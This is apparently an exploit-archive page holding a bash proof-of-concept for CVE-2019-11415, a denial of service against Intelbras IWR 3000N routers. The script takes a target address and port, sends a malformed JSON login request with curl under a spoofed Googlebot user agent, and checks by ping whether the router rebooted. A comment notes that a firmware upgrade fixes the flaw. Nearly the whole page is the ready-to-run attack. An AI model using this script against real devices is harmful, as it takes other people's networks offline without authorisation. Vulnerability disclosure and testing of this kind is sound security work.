Intelbras IWR 3000N - Denial of Service (Remote Reboot)

2019-04-30 18:05:12

#/bin/bash

# PoC based on CVE-2019-11415 created by Social Engineering Neo.
#
# Credit: https://1.337.zone/2019/04/08/intelbras-iwr-3000n-any-version-dos-on-malformed-login-request/
#
# A malformed login request allows remote attackers to cause a denial of service (reboot), as demonstrated by JSON misparsing of the \""} string to v1/system/login.
#
# Upgrade to latest firmware version iwr-3000n-1.8.7_0 for 3000n routers to prevent this issue.

clear
read -p "Enter Target Address Followed by Port: " target port # localhost 8080

alive=$(ping -c 1 $target | grep icmp* | wc -l)
if [ "$alive" -eq 0 ]; then
echo Target May be Offline or Blocking ICMP requests.
read -p "Would you Like to Proceed? (Y/n): " ans
if [ "$ans" = 'n' ] || [ "$ans" = 'N' ]; then
clear
exit
fi
fi

if [ "$port" -lt 65536 ] && [ "$port" -gt 0 ]; then
grab=$(curl -s -A 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)' --compressed --data-binary '\""}' $target:$port/v1/system/login)
else
echo "Incorrect Port."
fi

clear
alive=$(ping -c 1 $target | grep icmp* | wc -l)
if [ "$alive" -eq 0 ]; then
echo Router Successfully Taken Offline. #NOTE: if router blocks ICMP requests this may be inaccurate.
else
echo Exploit Unsuccessfull, Target May Not be Vulnerable.
fi

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.